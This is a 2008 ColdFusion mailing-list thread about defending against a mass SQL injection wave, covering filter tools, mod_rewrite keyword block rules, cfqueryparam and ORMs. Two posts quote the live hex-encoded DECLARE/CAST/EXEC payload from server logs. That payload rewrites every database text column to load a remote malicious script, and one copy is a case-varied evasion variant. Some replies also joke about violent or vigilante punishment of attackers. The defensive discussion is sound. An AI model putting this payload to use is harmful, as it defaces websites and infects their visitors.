OK. I thought it was from you. I was sent an email with the link to SQLprev.cfm in an email and they referenced I use your suggestion in the email as well. I stuck the two together.> David Moore, Jr. wrote:> > I am currently using the SQLprev.cfm from Jochem Jochem Wrote? > The what from whom?Please don't shoot me. I am new to all this? Sleep deprived... ~David _________________________________________________________________ Talk to your Yahoo! Friends via Windows Live Messenger.  Find out how. http://www.windowslive.com/explore/messenger?ocid=TXT_TAGLM_WL_messenger_yahoo_082008

I've upgraded to the latest version of Mary Jo's tool to filter attempts at SQL injection. It works well, but I found three interesting false positives today. My site has community profiles for cities and towns. The URL for these profiles includes the county name as well as the city or town name. There are Union counties in North Carolina, New Jersey and Ohio. There are three towns that get a false positive flag. They all start with "All" (Allenwood, Allen Center and Allens Crossroads). The URLs have the format of /Union/Allenwood.cfm, /Union/Allen-Center.cfm and /Union/Allens-Crossroads.cfm. Clearly, the combination of "Union/All" is causing the problem. Can anyone suggest a modification to the code that would eliminate the false positives without substantially weakening the filter? The RegEx in her tool, (http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18), is way beyond my skill set. TIA, Matt     ... ----- Excess quoted text cut - see Original Post for more -----

> Can anyone suggest a modification to the code > that would eliminate the false positives without substantially > weakening the filter? The one in there now is by Luis Melo and his email is in the credits. You might want to send them along to him as I know he plans to work more on reducing the false positives as he has time. It's definitely a challenge to make sure you catch everything bad and let everything good through, so some false positives are probably inevitable. --- Mary Jo

> My site has community profiles for cities and towns. The URL for these > profiles includes the county name as well as the city or town name. > There are Union counties in North Carolina, New Jersey and Ohio. Or...maybe you could just get the states to rename that county. ;-)

Mary Jo, I've done some additional testing and have found that the prior version of the SQL Injection Blocker does better when challenged with the HP Scrawlr testing tool then the newest version. Rolling back to the prior release also solved the false positive problem for the three towns mentioned earlier. Matt

> I've done some additional testing and have found that the prior > version of the SQL Injection Blocker does better when challenged with > the HP Scrawlr testing tool then the newest version. Rolling back to > the prior release also solved the false positive problem for the three > towns mentioned earlier. Hhm, interesting. My own customers ran into several problems with that version, that have been fixed with the new one. I'm not surprised it does better with scrawlr though as for us it had way more false positives and was blocking *too* much stuff. Just goes to show, there's no one solution that works for everyone...and how important it is not to rely on these tools exclusively since they clearly do not work 100% of the time. --- Mary Jo

I think it goes: RewriteCond %{QUERY_STRING} .*DECLARE.* [NC] to have the no-case option. Thanks for clarifying the loadmodule stuff, I should'a said something along those lines earlier. -- Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates ----- Excess quoted text cut - see Original Post for more -----

Seeing code solutions to this is cool. but imho its best left to your router/firewall to handle. I'd contact the provider to have them put some better controls in place. These are scenarios that almost delve into why cisco has the zero day features on their gear..

Security in layers. While it is usually best to thwart this style of attack at the route/firewall, it is wise to have the extra layers at the Apache/IIS/webserver, Coldfusion Application, CF Query and JDBC DB user permission layers.  If the first layer is bypassed or compromised then the next layer catches the attack and so on.  Having security in layers makes it that much harder for someone to launch a successful attack. Wil Genovese Sr. Web Application Developer On Mon, Aug 11, 2008 at 11:22 AM, Dana Kowalski <DanaKowalski@gmail.com>wrote: > Seeing code solutions to this is cool. but imho its best left to your > router/firewall to handle. I'd contact the provider to have them put some > better controls in place. These are scenarios that almost delve into why > cisco has the zero day features on their gear..

I've tried this on a windows apache server, but it doesn't seem to be working. Must it be in a VirtualDirectory block? I have it set outside so as to work on all sites. ----- Excess quoted text cut - see Original Post for more -----

A simple look at the docs would state why, but it doesn't appear to work if you've got it "floating" (rewrites in general).  I don't remember, off hand. I'm pretty sure it will work in a Directory or Location block too, tho. -- Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates > I've tried this on a windows apache server, but it doesn't seem to be > working. Must it be in a VirtualDirectory block? I have it set outside > so as to work on all sites.

You can keep it in a different .conf file, and use the Include directive, to pull it in wherever you need it, BTW. -- Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates > A simple look at the docs would state why, but it doesn't appear to > work if you've got it "floating" (rewrites in general).  I don't > remember, off hand. > > I'm pretty sure it will work in a Directory or Location block too, tho.

Hmm. I'm having no luck with this. I'm trying it on a blogcfc site, so it's being added after /...., so I also added path_info RewriteEngine on   RewriteCond %{QUERY_STRING} .*DECLARE.* [NC] RewriteRule ^(.*)$  /violation.htm RewriteCond %{PATH_INFO} .*DECLARE.* [NC] RewriteRule ^(.*)$  /violation.htm And it's not picking up when it sees declare in the url. ----- Excess quoted text cut - see Original Post for more -----

Strange.  And it looks like it /should/ work in the server conf too. Might be something like symlinks being turned off in the main Directory block or something. Try adding this (we'll leave off the ifModule, as we'd want an error if we don't have mod_rewrite loaded (and I'd try to limit where I'm allowing following of symlinks, doing rewriting, etc.):   Options +FollowSymLinks   Required: This is a security feature of the rewrite engine and must be set. It informs Apache to follow the newly created link names.   Options +Indexes   Optional, set it if you want to display a directory listing when no index page found (Uniform Server's default).   RewriteEngine On   Required: Turns the rewrite engine on and must be set.   RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]   RewriteRule .* /violation.htm [L]   RewriteCond %{PATH_INFO} .*DECLARE.* [NC]   RewriteRule .* /violation.htm [L] And be sure that /violation.htm is a valid path to a file! That bit me for a little bit (wrong named file, didn't seem to do anything). :DeN -- Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates ----- Excess quoted text cut - see Original Post for more -----

non-wrapped (and it was grabbed off the web somewhere):   Options +FollowSymLinks   Options +Indexes   RewriteEngine On   RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]   RewriteRule .* /violation.htm [L]   RewriteCond %{PATH_INFO} .*DECLARE.* [NC]   RewriteRule .* /violation.htm [L] The [L] tells it to stop there, BTW.

Theoretically, it would be possible to write a code-review type tool that uses database introspection to rewrite queries to use the proper cfqueryparms everywhere. Wouldn't work for queries built by code tho, so... hmmm.... I wonder why we can't do something like that at a lower-level, ya know?  Right before CF runs the query, verify that all params are bound to types?  Use a bit of caching or something ta boot?  Hmm... I'm digging on hibernate... ORMs are probably the answer, neh? Well, just random brainstorming... -- Wholey moley!  The opening of the Olympics was awersome!

No go. It's not life or death - Im still using cfqueryparam, but I'd love to get this working at the lowest level. ----- Excess quoted text cut - see Original Post for more -----

Ok, I've noticed that when I go to host.com/?declare it is working but host.com/x/index.cfm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); Is not working ----- Excess quoted text cut - see Original Post for more -----

Ray, Our sysadmin ran into the same issue when we started on this   yesterday  Here is part of the rule we're using now and it works for   the case yours does not. note the ^. RewriteCond %{QUERY_STRING} ^.*DECLARE.*$ Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine is a tax for doing wrong. A tax is a fine for doing well.

Still no go for me. I appreciate the help from all. ----- Excess quoted text cut - see Original Post for more -----

Hi Ray, I used this rewrite in the root directory's .htaccess file (linux/apache)... try Windows equiv?  I've run into the same problem that you describe using global rewrites in years past, but this directory-based method seems to work reliably. <Limit GET POST> order allow,deny allow from all RewriteEngine On .... rewrites here .... Regards --- On Sat, 8/9/08, Raymond Camden <rcamden@gmail.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

----- Excess quoted text cut - see Original Post for more ----- Here's what I have within my <VirturalHost> block: RewriteEngine On RewriteOptions Inherit RewriteCond %{QUERY_STRING} .*DECLARE.* [NC] RewriteRule ^(.*)$  /violation.htm [nc,L] Also, uncomment the LoadModule rewrite_module modules/mod_rewrite.so And make sure you restarted Apache for changes to take effect. With that I can do this and get redirected: http://myDomain/?foo=declare http://myDomain/?declare -- Matt Williams "It's the question that drives us."

Depending on your default directory settings in httpd.conf, you may   need to add the following directory attributes as well to your site to   allow mod_rewrite to operate: #Allow mod rewrite on this directory <Directory /srv/www/htdocs/mysite> Options FollowSymLinks AllowOverride All Order deny,allow Allow from all </Directory> Also, you can use pipe delimiters in the RewriteCond to add additional   SQL statements you might want to watch for (The syntax I'm seeing is   mostly MSSQL specific, but that could change): #Add the following if the site isn't using mod_rewrite yet RewriteEngine on #SQL Injection Redirects RewriteCond %{QUERY_STRING} .*DECLARE.*|.*NVARCHAR.*|.*EXEC\ (@.*|.*TRUNCATE TABLE.*|.*INSERT INTO.* RewriteRule ^(.*)$ /violation.htm [NC,L] HTH, Jon On Aug 9, 2008, at 7:32 AM, Matt Williams wrote: ----- Excess quoted text cut - see Original Post for more -----

Terry Ford wrote: > Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities. In 2001 it was: http://www.cert.org/advisories/CA-2001-26.html Now it is just business as usual. Jochem

Nimda did not use SQL injection as any sort of primary vector. SQL injection attacks have been around forever, but botnet/worm SQL injection attacks have really taken off pretty recently.  It has gotten so bad that even Microsoft recently released a security advisory article that doesn't deal with a major flaw in its own software.  That's rare ;) http://www.microsoft.com/technet/security/advisory/954462.mspx --- On Sat, 8/9/08, Jochem van Dieten <jochemd@oli.tudelft.nl> wrote: ----- Excess quoted text cut - see Original Post for more -----

Terry Ford wrote: > Nimda did not use SQL injection as any sort of primary vector. But it infected websites in order to infect browsers in order to infect websites etc. So the current wave of worms using the same mechanism is really 7 years too late to be ingenious. Jochem

Hysterical!! Ben Forta said ....> <<<<> On the plus side, it's nice to see CF finally getting the recognition it > deserves, even if it is from parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form > repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. ----- Excess quoted text cut - see Original Post for more ----- What makes you think they're lawyers, Ben? Mike Kear WIndsor, NSW, Australia CEO  AFP Webworks Pty Ltd http://afpwebworks.com

> even if it is from parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant > socially-inept basement-dwelling death-penalty-deserving hacker-wannabes Come on, Ben!  Don't hold back!  Tell us how you *really* feel!  :o) ----- Excess quoted text cut - see Original Post for more -----

I've heard that in Saudi Arabia, a thief has the offending member removed at the wrist. Since hackers commit their offence with their brain, wouldn't it be appropriate to behead them? Just a suggestion. :-\ Dave L. ----- Excess quoted text cut - see Original Post for more -----

>I've heard that in Saudi Arabia, a thief has the offending member removed at >the wrist. Since hackers commit their offence with their brain, wouldn't it >be appropriate to behead them? > >Just a suggestion. :-\ > >Dave L. Personally I'd rather they had a different part of their anatomy cut off. Mind you given they most likely live in their parent's basement, they probably would not miss it.

You assume much. Women are just as prowess at running a computer virus attack as men. We just don't hear about them as much, as they seem to not get caught as often. :) ::-----Original Message----- :: ::Sent: Sunday, August 10, 2008 5:57 PM ::To: CF-Talk ::Subject: Re: SQL injection attack on House of Fusion :: ::>I've heard that in Saudi Arabia, a thief has the offending member removed ::at ::>the wrist. Since hackers commit their offence with their brain, wouldn't ::it ::>be appropriate to behead them? ::> ::>Just a suggestion. :-\ ::> ::>Dave L. :: ::Personally I'd rather they had a different part of their anatomy cut off. :: ::Mind you given they most likely live in their parent's basement, they ::probably would not miss it. :: ::

You haven't been around teenage boys much recently.  That and the XBox are the ONLY things they would miss. Anyway, I propose the dot-com millionaires who left us stuck with the current mess in the spam and virus arena be personally required to fund an international Goon Squad with kneecap breaking instructions to go after these vandals. If someone did this crap to your house, you'd have the police and/or FBI out there in a heartbeat tracking down the criminals.  This is criminal mischief on a global scale. And if Interpol won't do anything about it, and if the powers that be refuse to attach any form of responsibility or traceability to the ownership of an IP address, then we may just have to implement vigilante measures and go after the crooks ourselves. Dave Morris (Owner of a huge web site who just spent 2 days fending off the barbarians at the gates) >::-----Original Message----- >::Mind you given they most likely live in their parent's basement, they >::probably would not miss it. >:: >::

In the last 7 hours since i set up a counter on it, i've had 2792 on sites far lower volume than HouseofFusion..  So do i get a prize? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month > Yeah, I've gotten a couple today.. but fortunately when Ray built > BlogCFC. he covered his bases. > > Scott Stewart > ColdFusion Developer

Sorry for the "top posting", where are we now in terms of best practice for cf8 protection again sql injection attack?  Going through 136+ posts seems a bit too much, many thanks.  Some one who has closely monitored this thread probably could help. ----- Excess quoted text cut - see Original Post for more -----

> Sorry for the "top posting", where are we now in terms of best practice for cf8 protection again sql injection attack?  Going through 136+ posts seems a bit too much, many thanks.  Some one who has closely monitored this thread probably could help. The same place we've always been: * Validate user input * Use CFQUERYPARAM For applications that have old code, run a tool that will tell you what queries need to be updated or run a front-end filter that will do a basic check on input while you're updating that old code to use proper security methods. CFQUERYPARAM: http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html Query scanning tools: http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect Basic URL value filter: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott

But I know all this, I thought the sql injection attack went beyond it, thanks anyway, Justin. ----- Excess quoted text cut - see Original Post for more ----- cfm/20> 08/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect ----- Excess quoted text cut - see Original Post for more -----

On Fri, Aug 15, 2008 at 1:12 PM, D > But I know all this, I thought the sql injection attack went beyond it, > thanks anyway, Justin. > it did not. -- A byte walks into a bar and orders a pint. Bartender asks him "What's wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought you looked a bit off."

> But I know all this, I thought the sql injection attack went beyond it, thanks anyway, Justin. Not as far as technique, but it was much larger in scale than most of us have experience before.  Some were getting hit so hard they had to filter it farther up the chain (IIS, firewall, etc.) but for the majority of us the standard secure coding methods kept it out. -Justin Scott

As an FYI: for those that did use Apache configs to stop this attack, if you did not make sure your check was not case sensitive your being hit again. I just saw this start coming into our logs this afternoon: Note that DECLARE changed to DeCLARE.  Some of the posts I saw for people to modify apache where checking for DECLARE in case sensitive mode. Cheers, It looks like the storm is still trying to rage. Wil Genovese ;DeCLARE%20@S%20CHAR(4000);SET%20@S =CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430 303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F 6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720 616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729 204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320 5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F 63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974 6C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C21 2D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162 6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); On Fri, Aug 15, 2008 at 3:30 PM, Justin Scott <jscott@gravityfree.com>wrote: ----- Excess quoted text cut - see Original Post for more -----

I am still getting around 50 to 75 attacks a day on about 20 of my websites. I applied the solution from JOCHEM that aborts the attach in the application.cfm file and then sends me an email. They just keep coming from different IP addresses so it is useless to do anything other than wait for the storm to pass and watch them eat up bandwidth. In the words of one of my all time favorites....AUGH! (that would be Charlie Brown for all you young ones) David G. Moore, Jr. UpstateWeb, LLC

>>Not as far as technique, but it was much larger in scale than most of us have experience before. By the way, are you still getting hits from this attack? I don't see any anymore. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

They completely stopped on the 11th, but they are back to day spelling it like "DeCLARE". ~Brad > >>Not as far as technique, but it was much larger in scale than most of us > have experience before. > > By the way, are you still getting hits from this attack? > I don't see any anymore.

And changed EXEC to  ExEC I am getting hit pretty hard again. It stopped for a few days but they are back. At 06:56 PM 8/15/2008, you wrote: >They completely stopped on the 11th, but they are back to day spelling it >like "DeCLARE". > >~Brad

What I'm curious about, is that there seems to be noone you can report this to? I got hammered again the other day.. this time as well through whatever form fields they could find. Mark ----- Excess quoted text cut - see Original Post for more -----

> What I'm curious about, is that there seems to be noone you can report this to? Well, I'm pretty sure there is something we could do, but the general attitude seems to be to just suck it up. And buy some stocks in the tech hardware/broadband market. ;] -- I got 3 new servers, and a switch!

Mark Mandel wrote: > What I'm curious about, is that there seems to be noone you can report this to? You can report it to the abuse department of the ISP of the originating IP. Just look up the IP delegation and the abuse address is usually right there. Jochem

LOL... Ever heard of IP spoofing? Sure you need to complain about it, but the one thing they need to do is track the packets. This will only work if all paths along the way, have log capturing to traverse the mac address to get the correct IP address. But yes start with your IP, give them as much info as they need to do their job with. It is then in their hands to contact the authorities to have the individual charged. I think this is one reason that there is not enough done when it comes to DoD, and SQL Injections. Which leaves me to something I have stated before, why the hell Coldfusion didn't build this under the hood to begin with I do not know. Then it wouldn't matter if you use cfqueryparam or not, there is nothing that this tag does that couldn't be done under the hood. However, it will not stop people from trying:-( I mean with all the filters that Coldfusion has from ajax to flex integration, one more filter for URL's would have been simple. -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 Mark Mandel wrote: > What I'm curious about, is that there seems to be noone you can report this to? You can report it to the abuse department of the ISP of the originating IP. Just look up the IP delegation and the abuse address is usually right there. Jochem

Andrew Scott wrote: > Ever heard of IP spoofing? Sure you need to complain about it, but the one > thing they need to do is track the packets. IP spoofing is really only a significant problem with UDP. With TCP any decent ISP will catch spoofs in their egress filters. Even your cheap, Taiwanese black box NAT router at home will stop spoofing for TCP because it won't be able to match the NAT state. You just send your complaints to the abuse department of their ISP and they will handle it. Or not, but that is really out of your hands. > But yes start with your IP, give them as much info as they need to do their > job with. It is then in their hands to contact the authorities to have the > individual charged. You want to charge somebody because his computer is infected with a trojan? > Which leaves me to something I have stated before, why the hell Coldfusion > didn't build this under the hood to begin with I do not know. Then it > wouldn't matter if you use cfqueryparam or not, there is nothing that this > tag does that couldn't be done under the hood. There is no way CF can guess the right datatypes to bind my function arguments to when I call a polymorphic function in the database. > I mean with all the filters that Coldfusion has from ajax to flex > integration, one more filter for URL's would have been simple. I haven't mentioned this before because I do believe that filtering request URLs is the wrong approach, but I'll let you in on a little secret: you can plug your filter regular expressions right into neo-security.xml. No need to change anything in any application, you just plug it in and enable the scriptprotect feature. Jochem

Hmmm, I believe IP spoofing is still a huge problem. I know little about it, so no more comment on that but a quick google shows that it is still a huge problem. As for polymorphic functions, that is not the issue. SQL injection is mainly passed via the URL, header or some form of post to the server. A filter can be placed to introspect every request to check the URL for known SQL injection attacks. That would then remove the need to had extra overload for each query, because the intail request would have already been checked. So if you where to have a component with 20 queries, and have hits of around 1000 the cycles to do SQL protection in the cfqueryparam would be reduce to one check and not 20 * 1000, but 1000 only. Surely that increase in speed has to be worth something? No? As for what else cfqeuryparam offers, this can be handled by the cfquery tag. After all ColdFusion has been using JDBC drivers for a long time, the cfqueryparam was introduced in the days when ColdFusion was not built ontop of Java. That means that the extra features that JDBC drivers introduce (like pooling, binding etc.) can be taken care of under the hood. And with a proper ORM, it would know what datatype you are requesting anyway. But as I stated once before, Coldfusion 9 with hibernate native support would elimante the SQL injection problem. I can't vouch for php, .Net but at least in the Java world ORM reduces that risk to nil. And its built into the ORM, so if the ORM can't work out your polymorphic function in the database then how does it do it? This thread was about SQL injection, and a more better response would be for the CFML engine to intercept every request and reject anything that looks remotely like a sql injection attack. If you where in the Java, Grails world there is no such thing as cfqueryparam. They do it under the hood, and there is no real reason that Coldfusion can adopt the same. How hard is that to understand? -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 Andrew Scott wrote: > Ever heard of IP spoofing? Sure you need to complain about it, but the one > thing they need to do is track the packets. IP spoofing is really only a significant problem with UDP. With TCP any decent ISP will catch spoofs in their egress filters. Even your cheap, Taiwanese black box NAT router at home will stop spoofing for TCP because it won't be able to match the NAT state. You just send your complaints to the abuse department of their ISP and they will handle it. Or not, but that is really out of your hands. > But yes start with your IP, give them as much info as they need to do their > job with. It is then in their hands to contact the authorities to have the > individual charged. You want to charge somebody because his computer is infected with a trojan? > Which leaves me to something I have stated before, why the hell Coldfusion > didn't build this under the hood to begin with I do not know. Then it > wouldn't matter if you use cfqueryparam or not, there is nothing that this > tag does that couldn't be done under the hood. There is no way CF can guess the right datatypes to bind my function arguments to when I call a polymorphic function in the database. > I mean with all the filters that Coldfusion has from ajax to flex > integration, one more filter for URL's would have been simple. I haven't mentioned this before because I do believe that filtering request URLs is the wrong approach, but I'll let you in on a little secret: you can plug your filter regular expressions right into neo-security.xml. No need to change anything in any application, you just plug it in and enable the scriptprotect feature. Jochem

Andrew Scott wrote: > I believe IP spoofing is still a huge problem. I know little about it, so no > more comment on that but a quick google shows that it is still a huge > problem. AIDS is a huge problem too. It is also about equally relevant for the current wave of SQL injection attacks. > As for polymorphic functions, that is not the issue. SQL injection is mainly > passed via the URL, header or some form of post to the server. A filter can > be placed to introspect every request to check the URL for known SQL > injection attacks. Yes, a sufficiently advanced filter (basically an allow list of values) can do that. But you did not claim a filter could do that, you claimed ColdFusion could do anything cfqueryparam does under the hood. And that is just not true. It is impossible to extrapolate the correct datatype of input BIND variables from the text of the query string. You need code or convention for that. > I can't vouch for php, .Net but at least in the Java world ORM reduces that > risk to nil. And its built into the ORM, so if the ORM can't work out your > polymorphic function in the database then how does it do it? With an ORM in combination with an untyped language my use case of polymorphic functions would probably end up as a configuration issue in the ORM and the ORM exposing multiple functions to the application. > This thread was about SQL injection, and a more better response would be for > the CFML engine to intercept every request and reject anything that looks > remotely like a sql injection attack. But you can do that already. Just fiddle with the allowed SQL options in CF and observe the random failures in the application as CF tries to interpret SQL. Whatever the solution is, it is not teaching CF how to interpret SQL. CF is the CFML runtime and should leave the interpretation of SQL to the database. > If you where in the Java, Grails world there is no such thing as > cfqueryparam. They do it under the hood, and there is no real reason that > Coldfusion can adopt the same. Maybe the tags don't exist, but in Java the concepts do. In fact, the CFML constructs map directly to Java classes: cfquery -> java -> jdbc -> statement cfquery + cfqyeryparam -> java -> jdbc -> preparedstatement cfstoredproc -> java -> jdbc -> callablestatement And I think Dave already explained to you why you shouldn't compare Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and Grails, you will see that neither exposes cfqueryparam like functionality to the programmer. (But please don't claim the concepts aren't there, they are just hidden behind an ORM). Jochem

Hmm, I wasn't trying to compare ColdFusion to Grails, I used grails as an example because it relies heavily on an ORM. The ORM has the needed datatypes for the DB (or bind / prepared Statements), but when it comes to SQL injection, it doesn't appear to be an issue. Please read what I said, I wasn't trying to compare apples to oranges. But they both have the ability to be infected, it is up to how that protection is put into place as to how much work is involved by the developer. I stand by the fact that cfqueryparam, can and should be taken care of under the hood. Other languages are doing it, so what does that tell you? That way older code, can be automatically be protected under the scenes with no change to the appliction you design. Its not rocket science, but it is something to consider. Hibernate has no problems with SQl injection why is that? Because hibernate DOES use prepared statements under the hood, so if it can there is no reason why Coldfusion can't. -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 Andrew Scott wrote: > I believe IP spoofing is still a huge problem. I know little about it, so no > more comment on that but a quick google shows that it is still a huge > problem. AIDS is a huge problem too. It is also about equally relevant for the current wave of SQL injection attacks. > As for polymorphic functions, that is not the issue. SQL injection is mainly > passed via the URL, header or some form of post to the server. A filter can > be placed to introspect every request to check the URL for known SQL > injection attacks. Yes, a sufficiently advanced filter (basically an allow list of values) can do that. But you did not claim a filter could do that, you claimed ColdFusion could do anything cfqueryparam does under the hood. And that is just not true. It is impossible to extrapolate the correct datatype of input BIND variables from the text of the query string. You need code or convention for that. > I can't vouch for php, .Net but at least in the Java world ORM reduces that > risk to nil. And its built into the ORM, so if the ORM can't work out your > polymorphic function in the database then how does it do it? With an ORM in combination with an untyped language my use case of polymorphic functions would probably end up as a configuration issue in the ORM and the ORM exposing multiple functions to the application. > This thread was about SQL injection, and a more better response would be for > the CFML engine to intercept every request and reject anything that looks > remotely like a sql injection attack. But you can do that already. Just fiddle with the allowed SQL options in CF and observe the random failures in the application as CF tries to interpret SQL. Whatever the solution is, it is not teaching CF how to interpret SQL. CF is the CFML runtime and should leave the interpretation of SQL to the database. > If you where in the Java, Grails world there is no such thing as > cfqueryparam. They do it under the hood, and there is no real reason that > Coldfusion can adopt the same. Maybe the tags don't exist, but in Java the concepts do. In fact, the CFML constructs map directly to Java classes: cfquery -> java -> jdbc -> statement cfquery + cfqyeryparam -> java -> jdbc -> preparedstatement cfstoredproc -> java -> jdbc -> callablestatement And I think Dave already explained to you why you shouldn't compare Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and Grails, you will see that neither exposes cfqueryparam like functionality to the programmer. (But please don't claim the concepts aren't there, they are just hidden behind an ORM). Jochem

Andrew Scott wrote: > I stand by the fact that cfqueryparam, can and should be taken care of under > the hood. Other languages are doing it, so what does that tell you? It tells me that they need additional configuration or convention. I have 2 functions with the following signatures in my database: find(needle:char, haystack:text):boolean find(needle:varchar, haystack:text):boolean I call the database in one place using: <cfquery ...>   SELECT find(     <cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,     <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />     ) </cfquery> In another place I use: <cfquery ...>   SELECT find(     <cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,       <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />     ) </cfquery> Along comes your ColdFusion version that can determine datatypes to bind to automagically. So now I start using: <cfquery ...>   SELECT find('x#', '#y#') </cfquery> But which of the two find() functions in the database is going to get executed? The only way to make sure a specific find() function is executed in the database is by configuring the ORM to do so. Fine, problem solved. But that is not under the hood. ORMs need configuration too. That is not under the hood. Jochem

Have you ever done any GORM work? Now technically embedding hibernate into ColdFusion would technically be under the hood as far as ColdFuison is concerned. I mean, I might as well by your reasoning say that ajaxUI is not under the hood in ColdFusion because it uses a 3rd part library to do its work. In the advent that ColdFusion does incorporate hibernate it will technically be under the hood, because your tags / functions call internal wrappers to ColdFusion to do the work for you. So technically GORM and its Domain Driven Design, is considered to be under the hood. Technically.... -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 Andrew Scott wrote: > I stand by the fact that cfqueryparam, can and should be taken care of under > the hood. Other languages are doing it, so what does that tell you? It tells me that they need additional configuration or convention. I have 2 functions with the following signatures in my database: find(needle:char, haystack:text):boolean find(needle:varchar, haystack:text):boolean I call the database in one place using: <cfquery ...>   SELECT find(     <cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,     <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />     ) </cfquery> In another place I use: <cfquery ...>   SELECT find(     <cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,       <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />     ) </cfquery> Along comes your ColdFusion version that can determine datatypes to bind to automagically. So now I start using: <cfquery ...>   SELECT find('x#', '#y#') </cfquery> But which of the two find() functions in the database is going to get executed? The only way to make sure a specific find() function is executed in the database is by configuring the ORM to do so. Fine, problem solved. But that is not under the hood. ORMs need configuration too. That is not under the hood. Jochem

-- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 And you haven't seen grails then, you can't get any more of a dyanmic language than that:-) It uses GORM, which is a entry point to hibernate and guess what it takes care of eveything I spoke about. Still no reason Coldfusion can't and I will stand by that. Andrew Scott wrote: > I can't vouch for php, .Net but at least in the Java world ORM reduces that > risk to nil. And its built into the ORM, so if the ORM can't work out your > polymorphic function in the database then how does it do it? With an ORM in combination with an untyped language my use case of polymorphic functions would probably end up as a configuration issue in the ORM and the ORM exposing multiple functions to the application. Jochem

You'll be happy to know that CF9 is rumoured to include Hibernate with a corresponding set of tags, so CF should indeed be able to deal with this under the hood. ----- Excess quoted text cut - see Original Post for more ----- -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Man your about 6 months late with that news.... -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 You'll be happy to know that CF9 is rumoured to include Hibernate with a corresponding set of tags, so CF should indeed be able to deal with this under the hood.

